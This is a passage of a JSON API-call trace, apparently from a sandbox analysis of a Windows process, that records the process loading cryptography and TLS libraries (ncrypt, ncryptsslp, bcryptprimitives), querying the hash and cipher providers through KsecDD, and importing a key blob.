"arguments": [ { "name": "ModuleName", "value": "mskeyprotect.dll" }, { "name": "ModuleHandle", "value": "0x7ffecb060000" }, { "name": "FunctionName", "value": "KeyFileProtectSessionTicket" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecb0674d0" } ], "repeated": 0, "id": 1454 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffedfab560a", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "mskeyprotect.dll" }, { "name": "ModuleHandle", "value": "0x7ffecb060000" }, { "name": "FunctionName", "value": "KeyFileUnprotectSessionTicket" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecb0679b0" } ], "repeated": 0, "id": 1455 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee352e53f", "parentcaller": "0x7ffee348faf7", "category": "process", "api": "NtSetInformationProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessInformationClass", "value": "93" }, { "name": "ProcessInformation", "value": "\\x7f7\\x9e}" } ], "repeated": 0, "id": 1456 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee3485157", "parentcaller": "0x7ffee34843ea", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "ncrypt.dll" } ], "repeated": 0, "id": 1457 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34cf37b", "parentcaller": "0x7ffee34cf207", "category": "filesystem", "api": "NtQueryAttributesFile", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "C:\\Temp\\ncrypt.dll" } ], "repeated": 0, "id": 1458 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34cf37b", "parentcaller": "0x7ffee34cf207", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\ncrypt.dll" } ], "repeated": 0, "id": 1459 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34cfc9c", "parentcaller": "0x7ffee34cf7b0", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000514" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ncrypt.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1460 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34cfcfe", "parentcaller": "0x7ffee34cf7b0", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000518" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000514" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ncrypt.dll" } ], "repeated": 0, "id": 1461 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee3484d42", "parentcaller": "0x7ffee3484aaa", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000518" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0570000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00027000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1462 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee347fee4", "parentcaller": "0x7ffee347fad8", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0592000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1463 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee3485082", "parentcaller": "0x7ffee34879d2", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0589000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1464 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34cfd68", "parentcaller": "0x7ffee34cf7b0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000518" } ], "repeated": 0, "id": 1465 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34cfd71", "parentcaller": "0x7ffee34cf7b0", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000514" } ], "repeated": 0, "id": 1466 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7bac", "parentcaller": "0x7ffee34a288a", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0589000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1467 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7bac", "parentcaller": "0x7ffee34a288a", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\ncrypt" }, { "name": "DllBase", "value": "0x7ffee0570000" } ], "repeated": 0, "id": 1468 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34d7cc6", "parentcaller": "0x7ffee34addf7", "category": "system", "api": "NtQuerySystemTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1469 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0592000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1470 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0592000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1471 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "system", "api": "LdrpCallInitRoutine", "status": true, "return": "0x00000001", "arguments": [ { "name": "MappedPath", "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\ncrypt" }, { "name": "BaseAddress", "value": "0x7ffee0570000" }, { "name": "InitRoutine", "value": "0x7ffee0576200" }, { "name": "Reason", "value": "1" } ], "repeated": 0, "id": 1472 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedfb33000" }, { "name": "ModuleName", "value": "schannel.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1473 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffedfb33000" }, { "name": "ModuleName", "value": "schannel.DLL" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1474 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7830", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0592000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1475 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee34b7881", "parentcaller": "0x7ffee34a20f9", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0592000" }, { "name": "ModuleName", "value": "ncrypt.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1476 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee14e6f25", "parentcaller": "0x7ffee14e4f88", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000178" }, { "name": "HandleName", "value": "\\Device\\KsecDD" }, { "name": "IoControlCode", "value": "0x00390400" }, { "name": "InputBuffer", "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x02\\x00\\x01\\x00\\xfe\\x7f\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00S\\x00S\\x00L\\x00 \\x00P\\x00r\\x00o\\x00t\\x00o\\x00c\\x00o\\x00l\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x01\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffP\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00c\\x00r\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x90\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffM\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00S\\x00S\\x00L\\x00 \\x00P\\x00r\\x00o\\x00t\\x00o\\x00c\\x00o\\x00l\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x00c\\x00r\\x00y\\x00p\\x00t\\x00s\\x00s\\x00l\\x00p\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1477 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee0574501", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\system32\\ncryptsslp" }, { "name": "DllBase", "value": "0x7ffecb1a0000" } ], "repeated": 0, "id": 1478 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee0574501", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ncryptsslp.dll" }, { "name": "BaseAddress", "value": "0x7ffecb1a0000" } ], "repeated": 0, "id": 1479 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee0574501", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffecb1a0000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\system32\\ncryptsslp.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 1480 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee05741ce", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ncryptsslp.dll" }, { "name": "ModuleHandle", "value": "0x7ffecb1a0000" }, { "name": "FunctionName", "value": "GetSChannelInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffecb1a1990" } ], "repeated": 0, "id": 1481 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee14e6f25", "parentcaller": "0x7ffee14e4f88", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000178" }, { "name": "HandleName", "value": "\\Device\\KsecDD" }, { "name": "IoControlCode", "value": "0x00390400" }, { "name": "InputBuffer", "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00S\\x00H\\x00A\\x001\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00A\\x001\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffS\\x00H\\x00A\\x001\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1482 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee14e2199", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "C:\\Windows\\System32\\bcryptprimitives.dll" }, { "name": "BaseAddress", "value": "0x7ffee1390000" } ], "repeated": 0, "id": 1483 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10c56b2", "parentcaller": "0x7ffee14e2199", "category": "system", "api": "LoadLibraryExW", "status": true, "return": "0x7ffee1390000", "arguments": [ { "name": "lpLibFileName", "value": "C:\\Windows\\system32\\bcryptprimitives.dll" }, { "name": "dwFlags", "value": "0x00000000" } ], "repeated": 0, "id": 1484 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee14e1bc4", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "bcryptPrimitives.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1390000" }, { "name": "FunctionName", "value": "GetHashInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee13a4460" } ], "repeated": 1, "id": 1485 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee14e6f25", "parentcaller": "0x7ffee14e4f88", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000178" }, { "name": "HandleName", "value": "\\Device\\KsecDD" }, { "name": "IoControlCode", "value": "0x00390400" }, { "name": "InputBuffer", "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00M\\x00D\\x005\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x005\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffM\\x00D\\x005\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00s\\x00.\\x00d\\x00l\\x00l\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1486 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee14e1bc4", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "bcryptPrimitives.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1390000" }, { "name": "FunctionName", "value": "GetHashInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee13a4460" } ], "repeated": 1, "id": 1487 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee14e6f25", "parentcaller": "0x7ffee14e4f88", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000178" }, { "name": "HandleName", "value": "\\Device\\KsecDD" }, { "name": "IoControlCode", "value": "0x00390400" }, { "name": "InputBuffer", "value": "M<+\\x1a\\x00\\x00\\x02\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00A\\x00E\\x00S\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "\\x01\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00X\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00S\\x00\\x00\\x00\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xffA\\x00E\\x00S\\x00\\x00\\x00M\\x00i\\x00c\\x00r\\x00o\\x00s\\x00o\\x00f\\x00t\\x00 \\x00P\\x00r\\x00i\\x00m\\x00i\\x00t\\x00i\\x00v\\x00e\\x00 \\x00P\\x00r\\x00o\\x00v\\x00i\\x00d\\x00e\\x00r\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x00\\x00\\x00\\x00\\x00\\x00\\x00K\\x00e\\x00y\\x00L\\x00e\\x00n\\x00g\\x00t\\x00h\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00b\\x00c\\x00r\\x00y\\x00p\\x00t\\x00p\\x00r\\x00i\\x00m\\x00i\\x00t\\x00" } ], "repeated": 0, "id": 1488 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d5d000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1489 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee10cac31", "parentcaller": "0x7ffee14e1bc4", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "bcryptPrimitives.dll" }, { "name": "ModuleHandle", "value": "0x7ffee1390000" }, { "name": "FunctionName", "value": "GetCipherInterface" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee13a9910" } ], "repeated": 0, "id": 1490 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffecb1a2af2", "parentcaller": "0x7ffee057220a", "category": "crypto", "api": "BCryptImportKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyBlob", "value": "0\\x02\\x00\\x00KSSM\\x02\\x00\\x01\\x00\\x05\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x80\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xcf\\xbb\\xa4\\x10+\\xc3\\xcf\\xbbzx\\xb7\\xf6\\xf1\\xd5\\xfb]\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xcf\\xbb\\xa4\\x10+\\xc3\\xcf\\xbbzx\\xb7\\xf6\\xf1\\xd5\\xfb]\\xcd\\xb4\\xe8\\xb1\\xe6w'\n\\x9c\\x0f\\x90\\xfcm\\xdak\\xa1\\x98\\xcb\\xda\\x8d~\\xbc\\xfd\\x87\\xe2\\xb3m{\\x8fi\\x06\\xdae\\xa4\\x8d\\xfe\\x1b\\x18py\\xf9\\xab\\x1d\\x02v\\xc2\\x1b\\xd8H\\x0b\\xec\\xc6S\\x13\\x9c\\xbf\\xaa\\xb8\\x81\\xbd\\xdcz\\x9ae\\x82\\xb3\\xa1@\\xd1\\xa0=\\xff{\\x18\\xbcB\\xa7b&'\\x08Dm\\x1c\\xd9\\xe4P\\xe3\\xa2\\xfc\\xec\\xa1\\x05\\x9e\\xca\\x86C0)w\\x9a\\xd4y\\x948(\\x955=\\xb6_\\xb3\\x8d\\xffDP\\x17+=\\xc4/\\x03\\xa8\\xf1\\x12\\xb5\\xf7BC\\x97h\\x99T\\xbcU]{\\xbf\\xfd\\xaci\n\n\\xee\\x12\\xf0@`FL\\x15==\\xf3\\xe8\\x91T\\xf9\\xe2\\x7fJ\\+\\x18:}\\xe0G\\x97& \\x04\\xebd\\x9d\\x95" }, { "name": "Flags", "value": "0x00000000" }, { "name": "CryptKey", "value": "0x05d5ec50" }, { "name": "Length", "value": "560" } ], "repeated": 0, "id": 1491 }, { "timestamp": "2025-11-20 10:58:35,344", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d60000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", 